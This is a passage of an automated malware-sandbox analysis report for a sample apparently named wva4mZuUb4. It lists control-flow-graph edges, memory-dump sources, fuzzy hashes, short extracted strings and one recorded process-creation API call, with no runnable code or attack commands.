                                control_flow_graph 1446 77a4535-77a4797 1475 77a67fd-77a6aab 1446->1475 1476 77a479d-77a54b0 1446->1476 1543 77a7990-77a892a 1475->1543 1544 77a6ab1-77a7988 1475->1544 1875 77a5830-77a67f5 1476->1875 1876 77a54b6-77a5828 1476->1876 2105 77a8cb0-77a8cc3 1543->2105 2106 77a8930-77a8ca8 1543->2106 1544->1543 1875->1475 1876->1875 2110 77a8cc9-77a92fd 2105->2110 2111 77a9305-77aa197 2105->2111 2106->2105 2110->2111 2494 77aa197 call 77abc2c 2111->2494 2495 77aa197 call 77abc1d 2111->2495 2492 77aa19d-77aa1a4 2494->2492 2495->2492
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0f9742127ed0b6cb017eda01f0bf9605cd5ec4d0ccaae989e1e3ccb9047683c4
                                • Instruction ID: db5857cdd181700cddd447acc8aaf4f7ba5f6d101333368c9c37970d96b98a9e
                                • Opcode Fuzzy Hash: 0f9742127ed0b6cb017eda01f0bf9605cd5ec4d0ccaae989e1e3ccb9047683c4
                                • Instruction Fuzzy Hash: E5B34670A057188FDB58EF39D989AACBBF2BB89301F0185EAD049A3754DB349D94CF41

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2496 77a4560-77a4797 2524 77a67fd-77a6aab 2496->2524 2525 77a479d-77a54b0 2496->2525 2592 77a7990-77a892a 2524->2592 2593 77a6ab1-77a7988 2524->2593 2924 77a5830-77a67f5 2525->2924 2925 77a54b6-77a5828 2525->2925 3154 77a8cb0-77a8cc3 2592->3154 3155 77a8930-77a8ca8 2592->3155 2593->2592 2924->2524 2925->2924 3159 77a8cc9-77a92fd 3154->3159 3160 77a9305-77aa197 3154->3160 3155->3154 3159->3160 3543 77aa197 call 77abc2c 3160->3543 3544 77aa197 call 77abc1d 3160->3544 3541 77aa19d-77aa1a4 3543->3541 3544->3541
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 02aa59edcc8f5dcfa764338b60b826ae490f18b6de4541751552951d615b82ad
                                • Instruction ID: 6937d3dc70e99fe5fb62bed37920d37e979699bce1788b0cc3eaa3fc3aef346b
                                • Opcode Fuzzy Hash: 02aa59edcc8f5dcfa764338b60b826ae490f18b6de4541751552951d615b82ad
                                • Instruction Fuzzy Hash: 1FB34670A057188FDB58EF39D989AACBBF2BB89301F0185EAD049A3754DB349D94CF41

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 4687 6274a58-627a216 call 627ae50 call 627bda9 5639 627a21c-627a223 4687->5639
                                Memory Dump Source
                                • Source File: 00000000.00000002.1923700244.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6270000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2ba6f646791d358b0ae969ea45ddca07a44f0441550bee3e7344c278ee41e751
                                • Instruction ID: ac093a3d1926777baa1bc797cd476263ad2569c67c6eb5a721d60e0fc3af2bea
                                • Opcode Fuzzy Hash: 2ba6f646791d358b0ae969ea45ddca07a44f0441550bee3e7344c278ee41e751
                                • Instruction Fuzzy Hash: 8FB30A70A053198FCB58FF39E9896ACBBF2BB84310F4185A9D449A3358DF349D948F85

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 5642 8f0c1d8-8f0c1fd 5643 8f0c204-8f0c228 5642->5643 5644 8f0c1ff 5642->5644 5645 8f0c229 5643->5645 5644->5643 5646 8f0c230-8f0c24c 5645->5646 5647 8f0c255-8f0c256 5646->5647 5648 8f0c24e 5646->5648 5654 8f0c47b-8f0c484 5647->5654 5648->5645 5648->5647 5649 8f0c3d0-8f0c3e8 5648->5649 5650 8f0c332-8f0c345 5648->5650 5651 8f0c456-8f0c468 5648->5651 5652 8f0c41b-8f0c44e call 8f05b68 5648->5652 5653 8f0c25b-8f0c27f 5648->5653 5648->5654 5655 8f0c281-8f0c292 5648->5655 5656 8f0c385 5648->5656 5657 8f0c2a8-8f0c2b0 5648->5657 5658 8f0c34a-8f0c37d call 8f0a518 5648->5658 5659 8f0c46d-8f0c476 5648->5659 5660 8f0c3ae-8f0c3b1 5648->5660 5661 8f0c2ee-8f0c306 5648->5661 5675 8f0c3ea-8f0c3f9 5649->5675 5676 8f0c3fb-8f0c402 5649->5676 5650->5646 5651->5646 5652->5651 5653->5646 5677 8f0c2b2-8f0c2b4 5655->5677 5678 8f0c294-8f0c2a6 5655->5678 5670 8f0c38e-8f0c3a9 5656->5670 5663 8f0c2b7-8f0c2c2 5657->5663 5658->5656 5659->5646 5672 8f0c3ba-8f0c3cb 5660->5672 5680 8f0c308-8f0c317 5661->5680 5681 8f0c319-8f0c320 5661->5681 5667 8f0c2c4-8f0c2d3 5663->5667 5668 8f0c2d5-8f0c2dc 5663->5668 5679 8f0c2e3-8f0c2e9 5667->5679 5668->5679 5670->5646 5672->5646 5682 8f0c409-8f0c416 5675->5682 5676->5682 5677->5663 5678->5646 5679->5646 5685 8f0c327-8f0c32d 5680->5685 5681->5685 5682->5646 5685->5646
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: e\1$e\1$"*p$"*p
                                • API String ID: 0-1513742261
                                • Opcode ID: 1c267a2bb06d17ccdf7809536ecd7315986c4b3714d605a14a2b25a1a72f289f
                                • Instruction ID: 9a179b2ab5c22c46ba7f8ce55f330811cb3f1d5432d215e1a8c992c1d9e5b5e4
                                • Opcode Fuzzy Hash: 1c267a2bb06d17ccdf7809536ecd7315986c4b3714d605a14a2b25a1a72f289f
                                • Instruction Fuzzy Hash: D081F3B4D05219CFCB14CFE9D9446AEBBF2BF88301F20952AC416BB294D7345A02DF64
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: (oq$(oq$(oq
                                • API String ID: 0-3376450984
                                • Opcode ID: 5f7c608e9c2955e2fa6668fdd8db85d575d214a5e8e33a200ef1a6dcf8a89e1c
                                • Instruction ID: ab712229c6febc8bc86db5f1c21784115125d882d0c00b8ebe2dcba56759fb93
                                • Opcode Fuzzy Hash: 5f7c608e9c2955e2fa6668fdd8db85d575d214a5e8e33a200ef1a6dcf8a89e1c
                                • Instruction Fuzzy Hash: 15125F31A00209DFDB25CF69D888AADBBF6FF88318F1480A9E515AB265D738DC51CF50
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6f$6f$$q
                                • API String ID: 0-2870187524
                                • Opcode ID: 3da05426e276cf51062b290a045a3e1fb92acef9991c9be780ed4544f4cc8da1
                                • Instruction ID: 70866ba772591fe40bf89ad60e4d8f9ff5a530e4396204fac4ccc8630212d436
                                • Opcode Fuzzy Hash: 3da05426e276cf51062b290a045a3e1fb92acef9991c9be780ed4544f4cc8da1
                                • Instruction Fuzzy Hash: 3571E4B4E00319DFDB54DFA9E58869EBBB2FF88301F20802AD906AB354DB345981CF55
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1923700244.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6270000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: PHq$U
                                • API String ID: 0-1655173598
                                • Opcode ID: b99041e54ca3e20a3f1d9ec12051a47c3489d530a67637c83f6174e4ecb9a47d
                                • Instruction ID: 07dbf18742310243b1dce2cc17da12ca8a43dce78c6f2620f38ab0401d2780dd
                                • Opcode Fuzzy Hash: b99041e54ca3e20a3f1d9ec12051a47c3489d530a67637c83f6174e4ecb9a47d
                                • Instruction Fuzzy Hash: 5872BE71B102058FEB98AB79D854B6E77A7BFC8210F248529E546DB3A4CF34DC06CB91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927957430.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7800000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: Teq$Teq
                                • API String ID: 0-2938103587
                                • Opcode ID: fc87abca3f6ccd031e1b04d1f7311c668eb4dc46a13997d609482a73af67c8e2
                                • Instruction ID: e1863ec866b0d1b7b429839759bf4f7eba9debd507f6bf3a326feddeac93e63f
                                • Opcode Fuzzy Hash: fc87abca3f6ccd031e1b04d1f7311c668eb4dc46a13997d609482a73af67c8e2
                                • Instruction Fuzzy Hash: F79103B0E142098FDB48CFA9C894ADEFBB2FF89310F24912AD415AB354D7749946CF61
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927957430.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7800000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: Teq$Teq
                                • API String ID: 0-2938103587
                                • Opcode ID: 69961e34d3327b8ede905a0c32a945f3e0aac918193de1a7536209be603678dd
                                • Instruction ID: cf76eee37c682a90fa4f292faf7d40785fecaba74be8bfb611e5dfd7a43f015d
                                • Opcode Fuzzy Hash: 69961e34d3327b8ede905a0c32a945f3e0aac918193de1a7536209be603678dd
                                • Instruction Fuzzy Hash: 5C91E1B4E102098FDB48CFAAC984ADEFBB2FF89300F24912AD415BB354D77499458F61
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6f$$q
                                • API String ID: 0-559323919
                                • Opcode ID: 81a975a5bf01aac1f3789ea414aa15e6cf843345d47abc99ee70a0a67f8551a0
                                • Instruction ID: 838d3edf4b82744793ca5f84b763a944b15e4b2bc1db6654831a7a63c0003bd1
                                • Opcode Fuzzy Hash: 81a975a5bf01aac1f3789ea414aa15e6cf843345d47abc99ee70a0a67f8551a0
                                • Instruction Fuzzy Hash: 7371E6B4E00309DFDB54DFA9E58469EBBB2FF89301F24842AD90AA7394DB345942CF51
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: (oq
                                • API String ID: 0-1999159160
                                • Opcode ID: 47e72930ef32ae91ae56091b7c021f8048376acd7314b5577b7f239a5ee503cd
                                • Instruction ID: 0135968ae75f109827a714c48a06176e91f82a6a3493644c45d16fe536ddfae6
                                • Opcode Fuzzy Hash: 47e72930ef32ae91ae56091b7c021f8048376acd7314b5577b7f239a5ee503cd
                                • Instruction Fuzzy Hash: 21127B70A002098FDB24DF69D848BAEBBF6FF88314F248569E546DB355DB389D41CB90
                                APIs
                                • CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 08F0BDC3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID: CreateProcessUser
                                • String ID:
                                • API String ID: 2217836671-0
                                • Opcode ID: db86f16ad1fbaa5723818c0cb5346173ebdc33cff683c70bae7d8f68bb1e4e15
                                • Instruction ID: 939dcfb222517375748a092ef3036f4cc7daf1c1468529abebcba858be049988
                                • Opcode Fuzzy Hash: db86f16ad1fbaa5723818c0cb5346173ebdc33cff683c70bae7d8f68bb1e4e15
                                • Instruction Fuzzy Hash: 8351F471D00229DFDB24CFA9C840BDDBBB5BF48314F0484AAE918B7250DB759A89DF90
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: $q
                                • API String ID: 0-1301096350
                                • Opcode ID: 6a21b4db9c549277add02628843788c54e13468eac6f1b060e1d1507877fb186
                                • Instruction ID: 565db81a117b8d942ddf0851d0171d981db353e9d55fea5b73db0d43e917ff77
                                • Opcode Fuzzy Hash: 6a21b4db9c549277add02628843788c54e13468eac6f1b060e1d1507877fb186
                                • Instruction Fuzzy Hash: 26B1B335B043189FEB289B79985567E7BF7BFC8310B04892EE546D7788DE39C8028791
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927957430.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7800000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: kQD
                                • API String ID: 0-3066535408
                                • Opcode ID: 0d86f48cbbcce5e8fc28662ac21ceab06d9bafdea33487c6fd91aede257943aa
                                • Instruction ID: 0b307b2892476e5ba40cd13b1aed752281dee17f6fd702f4738e3a4bb90c73e6
                                • Opcode Fuzzy Hash: 0d86f48cbbcce5e8fc28662ac21ceab06d9bafdea33487c6fd91aede257943aa
                                • Instruction Fuzzy Hash: E1C157B4D0420ADFCB64CFA9C9849AEFBB2FF99300F10C559C615AB254D734A982CF90
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927957430.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7800000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: >NG
                                • API String ID: 0-1926143806
                                • Opcode ID: a4477517c1c19e058c30d87604ddba0aac157adad0a5c2b3b187183395915eda
                                • Instruction ID: 08cae8c64884bf1ecf29a3bbdbf2405a035450d61573fad7bcb3bc7f700d8bfb
                                • Opcode Fuzzy Hash: a4477517c1c19e058c30d87604ddba0aac157adad0a5c2b3b187183395915eda
                                • Instruction Fuzzy Hash: DC6169B1E142098FDB48CFE9D9446AEFBF2BF89201F24C46AD419E7294D7348941CFA4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927957430.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7800000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5940b9d6b643ac0c7a95c9ebb6b8d5dbbe36d716627d9d19f18cbd572894367f
                                • Instruction ID: 6a772cc5f6a40635a1d318371d986cba0e8a5376d1539ac1461a015c9c3731c1
                                • Opcode Fuzzy Hash: 5940b9d6b643ac0c7a95c9ebb6b8d5dbbe36d716627d9d19f18cbd572894367f
                                • Instruction Fuzzy Hash: E8C24E70F003188FCB58AB79D99979EBFB2BB88300F5085A9D449A3754DF389D58CB91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927957430.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7800000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: <
                                • API String ID: 0-4251816714
                                • Opcode ID: 99cbe38e187580e2c67f5e945ca1e87aff99536ffad4953da391679b65a17cdb
                                • Instruction ID: 3460b045cd001b4e3f02a2f088c5711cd7e2ea74ba0cb00850ca6f8540406b0b
                                • Opcode Fuzzy Hash: 99cbe38e187580e2c67f5e945ca1e87aff99536ffad4953da391679b65a17cdb
                                • Instruction Fuzzy Hash: FC5181B1E01758CFDB59CFAAC9446DDBBF2AF89305F14C0AAD409AB264DB345A85CF40
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3463a9affd8f909353a913df08950a37bf6380adf82dcd7d3c3f7f71a1727683
                                • Instruction ID: 33bd1b2f92dd4b727138b8d156a2e051e026650ec2a1af47291f5cf15d6a82c3
                                • Opcode Fuzzy Hash: 3463a9affd8f909353a913df08950a37bf6380adf82dcd7d3c3f7f71a1727683
                                • Instruction Fuzzy Hash: 1BF13471E0176A8FCB64CF69C94479DBBB6BF88341F1485EAD40EAB254D770AA81CF00
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 94a353ff310bd61bda8aec3db0436f679331c2397f656d6782ad562e91ec3542
                                • Instruction ID: ef5269e61a8b0ce1bcce4915cc8864a3c092801eb7b6296aee7e6b5b1e3f3c9c
                                • Opcode Fuzzy Hash: 94a353ff310bd61bda8aec3db0436f679331c2397f656d6782ad562e91ec3542
                                • Instruction Fuzzy Hash: 3F51C332F003048FE7349B7AD8547AA7BE3BB89714F188428E5469F394CE799C418B91
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c8ac0eeb70c8ff53b0c1afd9678bdca13136a42e510e9b57e5db2443f65f0c81
                                • Instruction ID: 7e8fed50f1c7ae018966478cd2622706e4529e1636eb614dfac9fe9a5ed3cbb8
                                • Opcode Fuzzy Hash: c8ac0eeb70c8ff53b0c1afd9678bdca13136a42e510e9b57e5db2443f65f0c81
                                • Instruction Fuzzy Hash: 176117B0D0131ADFCB14CFE9D558AAEBBB1FF58301F108529D412AB290D7789A11EF55
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4275921dd2c4a46ecc32d78a275dfb256be2a176aa0b20db0d0bf6ce2297d241
                                • Instruction ID: fee40428e2454a8b6c81e8e1a0f7125bce746d2cfb95ea2241257985a0459008
                                • Opcode Fuzzy Hash: 4275921dd2c4a46ecc32d78a275dfb256be2a176aa0b20db0d0bf6ce2297d241
                                • Instruction Fuzzy Hash: 35513AB0D0031ADFCB14CFA9D5586AEBBB2FF58302F10852AD412EB290E7789A11DF51
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927957430.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7800000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 41534bf5b60fd6f1e87973e32c4e0ca811b550743ff2abeb89d48b63889e6090
                                • Instruction ID: 272754bf65da1a8e37a4aa4c0a7eec881e9f07e26f3b8e254a12f572e6179a6e
                                • Opcode Fuzzy Hash: 41534bf5b60fd6f1e87973e32c4e0ca811b550743ff2abeb89d48b63889e6090
                                • Instruction Fuzzy Hash: E7514CB1D01758CFDB58CFA5D9846DEBBB2BF89310F1484AAD409AB254CB345A85CF90
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927957430.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7800000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5dcdfa93db77f7cc1327959e439bd900d5545c5513f3c0404fd7da1763100a66
                                • Instruction ID: f0f45a4ca8b458b00ce336640e8f4c52bb38e6194ce16a2ae96672984d4a7091
                                • Opcode Fuzzy Hash: 5dcdfa93db77f7cc1327959e439bd900d5545c5513f3c0404fd7da1763100a66
                                • Instruction Fuzzy Hash: E1412CB5E006598FEB59CF6ADC4079EBBB3BFC9200F14C1AAD508AB254DB341A45CF61
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 700d2cb4f5e3b773f40b40d4f394a4d22a5ca5ac2674a4190f3fedf95aeb039b
                                • Instruction ID: 1556272264148b986e67b71991bff72382499cb226a71fd59d1ee3aa309859de
                                • Opcode Fuzzy Hash: 700d2cb4f5e3b773f40b40d4f394a4d22a5ca5ac2674a4190f3fedf95aeb039b
                                • Instruction Fuzzy Hash: AC21AA71E016188FEB58CFABDC4469EFBF7ABC8200F14C1BAD518A6254EB3416558F51

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 526 137b848-137b87d call 137b0fc 530 137b881-137b88d 526->530 531 137b87f 526->531 532 137b88f-137b8ab call 137b07c 530->532 531->532 537 137b8af-137b8bb 532->537 538 137b8ad 532->538 539 137b8bd-137b904 537->539 538->539 545 137b906-137b91d call 137ba58 539->545 546 137b955 539->546 548 137b923-137b927 545->548 547 137b95a-137b95e 546->547 549 137b975 547->549 550 137b960-137b96d 547->550 548->546 551 137b929-137b92d 548->551 555 137b976 549->555 550->549 552 137b940-137b953 551->552 553 137b92f-137b933 551->553 552->547 553->546 556 137b935-137b93d 553->556 555->555 556->552
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: PHq$Teq$Teq$Teq$Teq$Teq$Teq
                                • API String ID: 0-4244342005
                                • Opcode ID: a0e5020a92c0d6571ebc553d83f6c208786b6554a056140629e646de9826bba2
                                • Instruction ID: efe098d12698acd008a399b81eb8de9bf2b796211cc8a36666de4d10856e6855
                                • Opcode Fuzzy Hash: a0e5020a92c0d6571ebc553d83f6c208786b6554a056140629e646de9826bba2
                                • Instruction Fuzzy Hash: 85318430E002099BDB349F6985547AEFAF2BF8D714F248419D466A7388CF794C45DB91

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 559 1378ab0-1378ae5 560 1378f14-1378f18 559->560 561 1378aeb-1378b0e 559->561 562 1378f31-1378f3f 560->562 563 1378f1a-1378f2e 560->563 570 1378b14-1378b21 561->570 571 1378bbc-1378bc0 561->571 568 1378f41-1378f56 562->568 569 1378fb0-1378fc5 562->569 577 1378f5d-1378f6a 568->577 578 1378f58-1378f5b 568->578 579 1378fc7-1378fca 569->579 580 1378fcc-1378fd9 569->580 585 1378b23-1378b2e 570->585 586 1378b30 570->586 572 1378bc2-1378bd0 571->572 573 1378c08-1378c11 571->573 572->573 591 1378bd2-1378bed 572->591 581 1379027 573->581 582 1378c17-1378c21 573->582 587 1378f6c-1378fad 577->587 578->587 588 1378fdb-1379016 579->588 580->588 592 137902c-1379039 581->592 582->560 583 1378c27-1378c30 582->583 589 1378c32-1378c37 583->589 590 1378c3f-1378c4b 583->590 593 1378b32-1378b34 585->593 586->593 630 137901d-1379024 588->630 589->590 590->592 598 1378c51-1378c57 590->598 616 1378bef-1378bf9 591->616 617 1378bfb 591->617 593->571 600 1378b3a-1378b9c 593->600 601 1378efe-1378f02 598->601 602 1378c5d-1378c6d 598->602 643 1378ba2-1378bb9 600->643 644 1378b9e 600->644 601->581 605 1378f08-1378f0e 601->605 614 1378c81-1378c83 602->614 615 1378c6f-1378c7f 602->615 605->560 605->583 618 1378c86-1378c8c 614->618 615->618 619 1378bfd-1378bff 616->619 617->619 618->601 625 1378c92-1378ca1 618->625 619->573 626 1378c01 619->626 627 1378ca7 625->627 628 1378d4f-1378d7a call 13788f8 * 2 625->628 626->573 632 1378caa-1378cbb 627->632 645 1378e64-1378e7e 628->645 646 1378d80-1378d84 628->646 632->592 633 1378cc1-1378cd3 632->633 633->592 635 1378cd9-1378cf1 633->635 699 1378cf3 call 137c397 635->699 700 1378cf3 call 137c380 635->700 701 1378cf3 call 137c3a8 635->701 639 1378cf9-1378d09 639->601 642 1378d0f-1378d12 639->642 647 1378d14-1378d1a 642->647 648 1378d1c-1378d1f 642->648 643->571 644->643 645->560 668 1378e84-1378e88 645->668 646->601 649 1378d8a-1378d8e 646->649 647->648 650 1378d25-1378d28 647->650 648->581 648->650 653 1378db6-1378dbc 649->653 654 1378d90-1378d9d 649->654 655 1378d30-1378d33 650->655 656 1378d2a-1378d2e 650->656 658 1378df7-1378dfd 653->658 659 1378dbe-1378dc2 653->659 671 1378d9f-1378daa 654->671 672 1378dac 654->672 655->581 657 1378d39-1378d3d 655->657 656->655 656->657 657->581 664 1378d43-1378d49 657->664 661 1378dff-1378e03 658->661 662 1378e09-1378e0f 658->662 659->658 665 1378dc4-1378dcd 659->665 661->630 661->662 669 1378e11-1378e15 662->669 670 1378e1b-1378e1d 662->670 664->628 664->632 666 1378dcf-1378dd4 665->666 667 1378ddc-1378df2 665->667 666->667 667->601 673 1378ec4-1378ec8 668->673 674 1378e8a-1378e94 call 1377790 668->674 669->601 669->670 675 1378e52-1378e54 670->675 676 1378e1f-1378e28 670->676 677 1378dae-1378db0 671->677 672->677 673->630 680 1378ece-1378ed2 673->680 674->673 687 1378e96-1378eab 674->687 675->601 678 1378e5a-1378e61 675->678 683 1378e37-1378e4d 676->683 684 1378e2a-1378e2f 676->684 677->601 677->653 680->630 685 1378ed8-1378ee5 680->685 683->601 684->683 690 1378ee7-1378ef2 685->690 691 1378ef4 685->691 687->673 696 1378ead-1378ec2 687->696 693 1378ef6-1378ef8 690->693 691->693 693->601 693->630 696->560 696->673 699->639 700->639 701->639
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: (oq$(oq$(oq$(oq$(oq$(oq
                                • API String ID: 0-4267992933
                                • Opcode ID: e780dc89d963c0b3e0d46310337da96ddce9a04ef0c9f9063354887737cb07c7
                                • Instruction ID: 669575f639facaf4eb9514523036e8dde3a49799d86fc5dfa7e4acda84444d15
                                • Opcode Fuzzy Hash: e780dc89d963c0b3e0d46310337da96ddce9a04ef0c9f9063354887737cb07c7
                                • Instruction Fuzzy Hash: 61125C30A00249DFDB25CF68D988A9EBBF2FF88318F1485A9E519DB661D734EC41CB50

                                Control-flow Graph

                                • Executed
                                • Not Executed
